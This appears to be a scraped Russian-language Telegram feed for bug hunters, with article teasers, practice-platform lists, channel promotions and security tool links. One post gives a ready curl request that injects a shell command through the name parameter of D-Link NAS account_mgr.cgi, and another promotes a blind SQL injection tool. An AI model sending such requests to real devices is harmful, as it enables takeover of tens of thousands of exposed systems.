🔐 🔑 OAuth 2: как работает современная авторизация

Помнишь кнопку «Войти через Google»? Та самая кнопка, которая избавляет от необходимости запоминать очередной пароль. Сегодня разберем, как работает эта магия изнутри, почему гиганты вроде Spotify и Medium используют такой способ входа, и как внедрить его в свое приложение. Спойлер: это проще, чем кажется, и гораздо безопаснее традиционной формы регистрации.

Читать статью

💣 Токсичный разработчик: гений или бомба замедленного действия?

Токсичный разработчик — это специалист, с которым крайне некомфортно работать. Разбираемся в статье — как к нему относиться:

🔗 Ссылка

Топ-10 ресурсов для практики: на заметку начинающим багхантерам

🪳 PortSwigger Web Security Academy
🐛 HackTheBox
🕷 TryHackMe
🪲 PentesterLab
🐞 XSS game
🪳 OWASP Juice Shop
🐛 bWAPP
🕷 CTF365
🪲 Web Application Exploits and Defenses
🐞 flAWS challenge

#ctf #practice

Если предположить, что политика CORS не настроена... Какой сниппет уязвим для CSRF? Присылайте ответы в комментарии👇

#этобаза

Самые полезные каналы для программистов в одной подборке!

Сохраняйте себе, чтобы не потерять 💾

🔥Для всех

Библиотека программиста — новости, статьи, досуг, фундаментальные темы
Книги для программистов
IT-мемы
Proglib Academy — тут мы рассказываем про обучение и курсы
Азбука айтишника — здесь мы познаем азы из мира программирования

🤖Про нейросети
Библиотека робототехники и беспилотников | Роботы, ИИ, интернет вещей
Библиотека нейрозвука | Транскрибация, синтез речи, ИИ-музыка
Библиотека нейротекста | ChatGPT, Gemini, Bing
Библиотека нейровидео | Sora AI, Runway ML, дипфейки
Библиотека нейрокартинок | Midjourney, DALL-E, Stable Diffusion

#️⃣C#

Книги для шарпистов | C#, .NET, F#
Библиотека шарписта — полезные статьи, новости и обучающие материалы по C#
Библиотека задач по C# — код, квизы и тесты
Библиотека собеса по C# — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Вакансии по C#, .NET, Unity Вакансии по PHP, Symfony, Laravel

☁️DevOps

Библиотека devops’а — полезные статьи, новости и обучающие материалы по DevOps
Вакансии по DevOps & SRE
Библиотека задач по DevOps — код, квизы и тесты
Библиотека собеса по DevOps — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования

🐘PHP

Библиотека пхпшника — полезные статьи, новости и обучающие материалы по PHP
Вакансии по PHP, Symfony, Laravel
Библиотека PHP для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по PHP — код, квизы и тесты

🐍Python

Библиотека питониста — полезные статьи, новости и обучающие материалы по Python
Вакансии по питону, Django, Flask
Библиотека Python для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Python — код, квизы и тесты

☕Java

Книги для джавистов | Java
Библиотека джависта — полезные статьи по Java, новости и обучающие материалы
Библиотека Java для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Java — код, квизы и тесты
Вакансии для java-разработчиков

👾Data Science

Книги для дата сайентистов | Data Science
Библиотека Data Science — полезные статьи, новости и обучающие материалы по Data Science
Библиотека Data Science для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Data Science — код, квизы и тесты
Вакансии по Data Science, анализу данных, аналитике, искусственному интеллекту

🦫Go

Книги для Go разработчиков
Библиотека Go разработчика — полезные статьи, новости и обучающие материалы по Go
Библиотека Go для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Go — код, квизы и тесты
Вакансии по Go

🧠C++

Книги для C/C++ разработчиков
Библиотека C/C++ разработчика — полезные статьи, новости и обучающие материалы по C++
Библиотека C++ для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по C++ — код, квизы и тесты
Вакансии по C++

💻Другие каналы

Библиотека фронтендера
Библиотека мобильного разработчика
Библиотека хакера
Библиотека тестировщика
Вакансии по фронтенду, джаваскрипт, React, Angular, Vue
Вакансии для мобильных разработчиков
Вакансии по QA тестированию
InfoSec Jobs — вакансии по информационной безопасности
Библиотека разработчика игр | Gamedev, Unity, Unreal Engine

📁Чтобы добавить папку с нашими каналами, нажмите 👉сюда👈

Также у нас есть боты:
Бот с IT-вакансиями
Бот с мероприятиями в сфере IT

Мы в других соцсетях:
🔸VK
🔸YouTube
🔸Дзен
🔸Facebook *
🔸Instagram *

* Организация Meta запрещена на территории РФ

Кстати, на Standoff появилась возможность раскрывать отчеты багхантеров. Залетайте👇

🥷 Изучить раскрытые отчеты

#bugbounty

🥷 Command injection в параметре name для D-Link NAS

Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.

Настолько простой баг, который можно найти простым фаззингом:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

#pentest #bugbounty

🛠️ 4 новых вектора атак на веб-приложения: за заметку этичному хакеру

Один из способов увеличения шансов на успешное обнаружение багов — поиск новых векторов атак, которые могут пропускаться другими багхантерами. Из очередного гайда от Intigriti вы узнаете про:

☑️ LLM prompt injection
☑️ Prototype pollution
☑️ Client-side path traversals
☑️ Dependency confusion

👉 Читать

#bugbounty #recon

🚀 Linux Redirection Cheat Sheet: ускоряемся в работе с потоками

Используя STDIN, STDOUT и STDERR, мы можем контролировать, как перенаправлять данные, будь то в файл или null, или объединять ошибки с выводом. Например, чтобы поймать все ошибки скрипта в отдельный лог-файл, легко использовать 2> error.log, а если хотите собрать всё вместе, можно воспользоваться 2>&1.

💡 Знаете ли вы, что порядок перенаправлений имеет значение? Команды command > /dev/null 2>&1 и command 2>&1 > /dev/null делают совершенно разные вещи! Так что будьте внимательны. 😉

#linux #tips by sysxplore

⚒️🔥 BlindBrute — настраиваемый Python-инструмент для обнаружения слепых атак с использованием SQL-инъекций

Он поддерживает несколько методов обнаружения, включая проверку кода состояния, длины содержимого, сравнение ключевых слов и проверку по времени.

Инструмент также позволяет гибко внедрять пэйлоад с помощью заголовков, строк запроса, данных запроса и сырых шаблонов HTTP-запросов, что делает его пригодным для широкого спектра кейсов.

👉 GitHub

#tools #pentest #recon

👂 Listen to the Whispers: Web Timing Attacks that Actually Work

James Kettle наконец-то выступил с докладом по теме своего исследования, связанного с новыми концепциями атак. Они позволяют узнать секреты сервера, включая скрытые неверные конфигурации, слепое внедрение структур данных, скрытые роуты к запрещенным зонам и обширную область невидимых поверхностей атак.

👉 Смотреть

#bugbounty #research

💡🔍 Отфильтруйте активные имена хостов из списка пассивных поддоменов, а затем проверьте наличие активных HTTP-сервисов и определите используемые технологии с помощью опции httpx -td!

Все это можно получить с помощью простого однострочника👆

#bugbounty #recon #tips by bugcrowd